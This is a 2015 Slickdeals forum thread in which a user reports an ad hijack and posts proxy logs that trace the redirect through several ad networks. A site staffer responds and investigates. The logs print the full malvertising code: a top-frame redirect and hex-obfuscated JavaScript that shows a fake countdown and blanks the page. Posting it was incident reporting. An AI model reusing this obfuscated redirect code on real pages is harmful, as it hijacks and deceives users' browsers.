Forum Thread

Anyone been ad-jacked from slickdeals recently?

disk 1,750 626 December 9, 2015 at 09:57 PM
This evening I think I was ad-jacked, I didn't click an ad but as I was scrolling down a slickdeals page it redirected. I was not logged in. My mouse pointer may have gone over an ad as I was scrolling but I didn't click anything. I know this has happened before but it was a long time ago because I can't remember much about it. I am trying to trace it back (I have proxy logs this time) but I can't figure out where it started cause there's like a blizzard of 100 ad servers after the slickdeals connection, and I opened two tabs to slickdeals at once. And I can't post the logs here because they're mixed in with other traffic (though there might be some way to go through it one-by-one and pick out anything with an sd referrer).

Here's the link I clicked it was from a slickdeals e-mail for a dell inspiron laptop:
Code:
http://slickdeals.net/da/mem-d/p80411667/k18/u87621/r6
Once the page loads it seems to go in this order:

ox-d.slickdeals.servedbyopenx.com
x.vindicosuite.com
go.goadvs.com

That last one is where things get wacky. See the attached screenshot. It directed me to a page saying "Site will resume in 10 secs..." then counts down and once it reached 0 it went to a blank tab (I happened to take the screenshot right before that happened).

Here's the handoff from vindico to goadvs

Code:
GET http://x.vindicosuite.com/serve/v=5;m=3;l=40295;c=874454;b=3764922;ts=1449723681;u=%3Cpage_url_escaped%3E;r=%3Creferrer_escaped%3E;ad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA;z=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D;xid=2901830426562714529;ep=1 HTTP/1.1
Host: x.vindicosuite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://slickdeals.net/f/8357843-dell-inspiron-15-i5558-5717slv-signature-edition-laptop-intel-core-i5-5250u-15-6-1080p-touchscreen-8gb-1tb-backlit-keyboard-win-10-449-free-shipping-microsoft-store?p=80411667&utm_source=dealalerts&utm_medium=em-d&utm_term=18&utm_content=u87621&utm_campaign=tu6
Cookie: ct=1449723681
Connection: keep-alive


HTTP/1.1 200 OK
Server: WebStar 1.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD, POST, TRACE, OPTIONS
Access-Control-Allow-Headers: Content-Type
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Thu, 10 Dec 2015 05:01:21 GMT

cd7
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="viewport" content="width=device-width, initial-scale=1"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><div id="SM__adt__40295376492214497236812011396893"><iframe src='http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct=' width=300 height=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe><script language="JavaScript" type="text/javascript" src="http://sdk.vindicosuite.com/verify_selector.js?event=1&iid=SM__adt__40295376492214497236812011396893&pid=0&lid=0&clid=3&aid=0&cid=0&crid=0&pt=3&ppid=1&pioid=&pbkid=282882&pcid=874454&plid=40295&dur=0&adw=300&adh=250&uebu=http%3A%2F%2Fx.vindicosuite.com%2Fevent%2Fe%3D%24SUGR_CUSTOM_EVENT_ID%24%3Bl%3D40295%3Bb%3D3764922%3Bc%3D874454%3Bsmuid%3D%3Bmsd%3D%3Bta%3D1449723681%3Btk%3D40668%3Bcr%3D2478432676%3Bad%3DCOe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz%3DCNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%252FdVyPAj%252BSAQNVU0S9AVyPAj%252FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%253D%3Bxid%3D2901830426562714529%3Bdcr%3D1%3Beav%3D%24SUGR_EVENT_ARGUMENT%24%3B%24SUGR_EVENT_PARAM%24%3Beov%3D%24SUGR_EVENT_OBJ%24%3Bmpws%3D%24SUGR_AD_WIDTH%24%3Bmphs%3D%24SUGR_AD_HEIGHT%24%3Bdsd%3D%24SUGR_DETERMINED_DOMAIN%24%3Bsnvs%3D%24SNAP_IN_VIEW%24%3Bsls%3D%24APP_SUGR_LOCATION%24%3Bsvn%3D%24APP_SUGR_VERSION%24%3Bals%3D%24APP_ADT_LOCATION%24%3Bavn%3D%24APP_ADT_VERSION%24%3Bspr%3D%24SUGR_QUERY_PARAMETERS%24&rn=1449723681"></script></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=1449723681772&cmxid=2101.010087445403764922xmc" style="display: none" height="1" width="1" border="0" /><script>   var _comscore = _comscore || [];   _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891"});   (function() {     var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;     s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el);   })(); </script> <noscript>   <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript><script language="JavaScript" type="text/javascript" src="http://x.vindicosuite.com/event/e=52;l=40295;b=3764922;c=874454;smuid=;ts=1449723681"></script><iframe style="position: absolute;" src="https://b12.myspace.com/b12/0" width="1" height="0" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" frameborder="0" scrolling="no" bordercolor="#000000"></iframe></body></html>
0
So in there you can see an iframe, here's part of it:
Code:
<iframe src='http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click.....
Here's goadvs:
Code:
GET http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct= HTTP/1.1
Host: go.goadvs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://x.vindicosuite.com/serve/v=5;m=3;l=40295;c=874454;b=3764922;ts=1449723681;u=%3Cpage_url_escaped%3E;r=%3Creferrer_escaped%3E;ad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA;z=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D;xid=2901830426562714529;ep=1
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 10 Dec 2015 05:01:21 GMT
Content-Length: 984
Content-Type: text/html; charset=utf-8
Via: 1.1 google
Server: GFE/2.0

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
try {
window.top.location.href="http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250&ct=Alw345BiZ1B2wPB2wDqfskaf0TamxC9WASwagk9Ox1B2wk9NA-9UYeYTsPBiwLBap3YGYe9Ep2BiZkrap3Z3pLXI91BiZkpap3ZM9iZ39eZap3YPYe9Epi4o9LJ2pPBiZDwiYe9EpeZ3je42piQMp1BiZDtdYe9EBSaNeWVaekaQ-e~O0ib9wDVittY51D0vBeVCZovox-Wr-EdMwmEC.DtDt30gA3BoAaJFSoriQSseBTIbso0dskFrsBI84t0y9EtM.EbyQPW_Ba919o4ap3YV05BiwE960e0~AEwD0-Vy9E9IZBYgZtbCAJbi9L90-BYw1BGdwtty9S0~9tEF4eqFt3F2xLtwwks~wodex3XIs3bX03YdZBt~Ye95.PBiwE9jQS0jBJpo9-ttZJsdBSsj.kpietwU.EWdpld6tWJ3ebwwsWaz0Cw6wTFU-apFAWdywkW0tEB2e-dbp3uStSb_wEEieDdm.EuBwSaptEIveBwtsEuB0itABin3eWs1xEFSBkW9tWdvetw0.BWBQitAtB9wpDJWeJb~ZBb~wat~ZBb~ZtVwZBbYwB0NZBb~0WbSpEb~ZBEapJ0JtDaZZ-vapJYeZtbjtaBrBia~tDaZZ-vapJ0wZtbp-BbweTs~BBwOZtbEs3bwZWb~0390Z-s~Ye9EYe95.TaJYe9EpmJrpeqipLZ29mBopm4F9LB2j1BiZktrYe9Ep1BiZkwms5Biwn=="
} catch(e) {}
</script>
</body>
</html>
So in there you can see window location changed, here's part of it:
Code:
window.top.location.href="http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250
Here's that destination at goadvs:
Code:
GET http://go.goadvs.com/intrsl?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&w=300&h=250&ct=Alw345BiZ1B2wPB2wDqfskaf0TamxC9WASwagk9Ox1B2wk9NA-9UYeYTsPBiwLBap3YGYe9Ep2BiZkrap3Z3pLXI91BiZkpap3ZM9iZ39eZap3YPYe9Epi4o9LJ2pPBiZDwiYe9EpeZ3je42piQMp1BiZDtdYe9EBSaNeWVaekaQ-e~O0ib9wDVittY51D0vBeVCZovox-Wr-EdMwmEC.DtDt30gA3BoAaJFSoriQSseBTIbso0dskFrsBI84t0y9EtM.EbyQPW_Ba919o4ap3YV05BiwE960e0~AEwD0-Vy9E9IZBYgZtbCAJbi9L90-BYw1BGdwtty9S0~9tEF4eqFt3F2xLtwwks~wodex3XIs3bX03YdZBt~Ye95.PBiwE9jQS0jBJpo9-ttZJsdBSsj.kpietwU.EWdpld6tWJ3ebwwsWaz0Cw6wTFU-apFAWdywkW0tEB2e-dbp3uStSb_wEEieDdm.EuBwSaptEIveBwtsEuB0itABin3eWs1xEFSBkW9tWdvetw0.BWBQitAtB9wpDJWeJb~ZBb~wat~ZBb~ZtVwZBbYwB0NZBb~0WbSpEb~ZBEapJ0JtDaZZ-vapJYeZtbjtaBrBia~tDaZZ-vapJ0wZtbp-BbweTs~BBwOZtbEs3bwZWb~0390Z-s~Ye9EYe95.TaJYe9EpmJrpeqipLZ29mBopm4F9LB2j1BiZktrYe9Ep1BiZkwms5Biwn== HTTP/1.1
Host: go.goadvs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://go.goadvs.com/ad?id=20&p=55.00&w=300&h=250&ct=http://x.vindicosuite.com/click/v=5%3Bm=3%3Bl=40295%3Bc=874454%3Bb=3764922%3Bts=1449723681%3Bui=QylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad=COe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz=CNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid=2901830426562714529%3Bep=1%3Bdct=
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 10 Dec 2015 05:01:22 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Via: 1.1 google
Server: GFE/2.0

800
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<script>
var e= document.createElement("div")
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x74\x6F\x70\x3A\x30\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x6C\x65\x66\x74\x3A\x30\x3B\x72\x69\x67\x68\x74\x3A\x30\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x63\x6F\x6C\x6F\x72\x3A\x23\x46\x46\x30\x30\x30\x30\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x46\x46\x46\x46\x46\x46\x3B");
e.id="go"
e.innerHTML="<br>Site will resume in 10 secs...<hr color='#A8A8A'>"
try{document.body.appendChild(e)}catch(h){}
var b= document.createElement("div");
b.id="ok";
b.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x74\x6F\x70\x3A\x35\x70\x78\x3B\x20\x72\x69\x67\x68\x74\x3A\x35\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x64\x65\x6E\x3B\x20\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x3B");
b.innerHTML="<iframe src='http://go.goadvs.com/get?id=20&uuid=eafcdb7e-73e7-449c-92ea-d99f5bf8ada8&ts=1449723681935167695&ct=http%3A%2F%2Fx.vindicosuite.com%2Fclick%2Fv%3D5%3Bm%3D3%3Bl%3D40295%3Bc%3D874454%3Bb%3D3764922%3Bts%3D1449723681%3Bui%3DQylOXeNiXY0og1MFxsURBJvhQ8wCj6mmpXJxF17zugWFKkE6jY1_l3awSPnEwfivlpuN_qVj4ExxAjb-JRSR7g%3Bad%3DCOe6AhDgehj4CyABKAQwjAs43YYBQIKiEUj5vA5Q1q81WLrl5QFgAGjSoB9wAHgBiAEA%3Bz%3DCNavNRC65eUBGiQwNzc3MTkxMi0zOWY4LTQwYzgtODlkZS1kZjFmYTE2MjE3OWUqJDA3NzcxOTEyLTNhMDUtOTg5ZS04OWRlLWRmMWZhMTYyMTc5ZUCQ2y5NAAAAAFUAAAAAXQAAIEFlAAAgQW0AAAA%2FdVyPAj%2BSAQNVU0S9AVyPAj%2FQAQLYAQLgAQDoAQDwAQCQAgCYAgA%3D%3Bxid%3D2901830426562714529%3Bep%3D1%3Bdct%3D' WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></iframe>"
try{document.body.appendChild(b)}catch(h){}
var a=document.createElement("a")
a.setAttribute("style","\x76\x69\x73\x69\x62\
800
x69\x6C\x69\x74\x79\x3A\x68\x69\x64\x64\x65\x6E\x3B\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x30\x30\x30\x30\x45\x45\x3B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x20\x31\x2E\x34\x65\x6D\x3B\x20\x74\x6F\x70\x3A\x35\x70\x78\x3B\x20\x72\x69\x67\x68\x74\x3A\x35\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x30\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3D\x2D\x31");
a.text = "Go to Site >";
a.href="#"
a.id="yo"
try{document.body.appendChild(a)}catch(h){}
e= document.createElement("div")
e.id="error"
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x32\x65\x6D\x3B\x77\x69\x64\x74\x68\x3A\x33\x30\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x32\x35\x30\x70\x78\x3B\x70\x61\x64\x64\x69\x6E\x67\x3A\x32\x30\x70\x78\x3B\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x63\x65\x6E\x74\x65\x72\x3B\x6C\x65\x66\x74\x3A\x33\x38\x25\x3B\x6D\x61\x72\x67\x69\x6E\x3A\x61\x75\x74\x6F\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3D\x32\x3B\x62\x6F\x74\x74\x6F\x6D\x3A\x35\x30\x25\x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x46\x30\x46\x30\x46\x30\x3B\x62\x6F\x72\x64\x65\x72\x2D\x63\x6F\x6C\x6F\x72\x3A\x23\x41\x38\x41\x38\x41\x38\x3B\x62\x6F\x72\x64\x65\x72\x2D\x73\x74\x79\x6C\x65\x3A\x73\x6F\x6C\x69\x64\x3B\x62\x6F\x72\x64\x65\x72\x2D\x77\x69\x64\x74\x68\x3A\x32\x70\x78\x3B");
e.innerHTML="<img src='http://storage.googleapis.com/psas/adc_fma_call_ny_300x250.jpg'>"
try{document.body.appendChild(e)}catch(h){}
e=document.createElement("div")
e.setAttribute("style","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x72\x69\x67\x68\x74\x3A\x32\x30\x70\x78\x3B\x74\x6F\x70\x3A\x31\x70\x78\x3B\x66\x6F\x6E\x74\x2D\x73\x69\x7A\x65\x3A\x30\x2E\x34\x65\x6D\x3B\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x72\x69\x67\x68\x74");
e.innerHTML="Advertisment"
try {document.getElementById("error").appendChild(e);} catch(h){}
var _0xed74=["\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x76\x69\x73
4c3
\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x79\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x76\x69\x73\x69\x62\x6C\x65","\x67\x6F","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x62\x72\x3E\x53\x69\x74\x65\x20\x77\x69\x6C\x6C\x20\x72\x65\x73\x75\x6D\x65\x20\x69\x6E\x20","\x20\x73\x65\x63\x73\x2E\x2E\x2E\x3C\x68\x72\x20\x63\x6F\x6C\x6F\x72\x3D\x27\x23\x41\x38\x41\x38\x41\x38\x27\x3E","","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x6F\x6B","\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];var secs=10;window[_0xed74[0]](cd,1000,secs);function cd(_0x21dcx3){try{if(_0x21dcx3>0){_0x21dcx3--;if(secs-_0x21dcx3==1){document[_0xed74[4]](_0xed74[3])[_0xed74[2]][_0xed74[1]]=_0xed74[5]};x=document[_0xed74[4]](_0xed74[6]);x[_0xed74[7]]=_0xed74[8]+_0x21dcx3+_0xed74[9];window[_0xed74[0]](cd,1000,_0x21dcx3);}else {x=document[_0xed74[4]](_0xed74[6]);x[_0xed74[7]]=_0xed74[10];}}catch(e){}}window[_0xed74[0]](function(){try{document[_0xed74[4]](_0xed74[13])[_0xed74[12]][_0xed74[11]](b)}catch(e){};window[_0xed74[16]][_0xed74[15]](_0xed74[14]);},15000);
</script>
</body>
</html>
0

3 Comments

1

Sign up for a Slickdeals account to remove this ad.

#2
Quote from disk View Post :
This evening I think I was ad-jacked, I didn't click an ad but as I was scrolling down a slickdeals page it redirected. I was not logged in. My mouse pointer may have gone over an ad as I was scrolling but I didn't click anything. I know this has happened before but it was a long time ago because I can't remember much about it. I am trying to trace it back (I have proxy logs this time) but I can't figure out where it started cause there's like a blizzard of 100 ad servers after the slickdeals connection, and I opened two tabs to slickdeals at once. And I can't post the logs here because they're mixed in with other traffic (though there might be some way to go through it one-by-one and pick out anything with an sd referrer).

Here's the link I clicked it was from a slickdeals e-mail for a dell inspiron laptop:Code:http://slickdeals.net/da/mem-d/p80411667/k18/u87621/r6 Once the page loads it seems to go in this order:

ox-d.slickdeals.servedbyopenx.com
x.vindicosuite.com
go.goadvs.com

That last one is where things get wacky. See the attached screenshot. It directed me to a page saying "Site will resume in 10 secs..." then counts down and once it reached 0 it went to a blank tab (I happened to take the screenshot right before that happened).
Hey disk,

This is a huge help. Thanks so much for including this info. I'm working on finding the source of this right now. By end of day, I should get confirmation that it's been blocked.
Reply Helpful Comment? 0 0
Last edited by cgrady December 10, 2015 at 11:50 AM
Joined Dec 2005
L6: Expert
1,750 Posts
626 Reputation
Original Poster
#3
Quote from doublewood View Post :
Hey disk,

This is a huge help. Thanks so much for including this info. I'm working on finding the source of this right now. By end of day, I should get confirmation that it's been blocked.
Great, cause I just got ad-jacked again as I opened this page to check replies. Same goadvs outcome. If you need anything else let me know.

Edit: Also note the ad-jack is aggressive, if I click the back button it just brings me forward to the goadvs thing again with a different ad. To workaround this I opened a second tab to this same thread which is how I'm posting this.
Edit2: The ad-jacking on this page may have something to do with the way you quoted your reply which originally included the ad html code I posted, therefore that code may have caused the ad-jacking as it was quoted so I can't say for certain I was ad-jacked this time, the html in the quoted reply may have done it.
Reply Helpful Comment? 0 0
Last edited by disk December 10, 2015 at 11:53 AM
#4
Quote from disk View Post :
Great, cause I just got ad-jacked again as I opened this page to check replies. Same goadvs outcome. If you need anything else let me know.

Edit: Also note the ad-jack is aggressive, if I click the back button it just brings me forward to the goadvs thing again with a different ad. To workaround this I opened a second tab to this same thread which is how I'm posting this.
Edit2: The ad-jacking on this page may have something to do with the way you quoted your reply which originally included the ad html code I posted, therefore that code may have caused the ad-jacking as it was quoted so I can't say for certain I was ad-jacked this time, the html in the quoted reply may have done it.
Exactly right. The reason we were seeing it on this thread is because the way I quoted the code. My post is now edited and not seeing the ad anymore. I haven't been able to replicate, which is good because it means it's rare, but I do want to catch it to get more info on where it's coming from. The code you provided is very helpful and I still think we'll be able to get to the bottom of it. We have pretty basic ads on the site through the largest, most credible, and established platforms. We have a zero tolerance policy on any kind of intrusive ads like these interstitials.
Reply Helpful Comment? 0 0
Page 1 of 1
1
Join the Conversation
Add a Comment
 
Copyright 1999 - 2016. Slickdeals, LLC. All Rights Reserved. Copyright / Infringement Policy  •  Privacy Policy  •  Terms of Service  •  Acceptable Use Policy (Rules)  •  Interest-Based Ads
Link Copied to Clipboard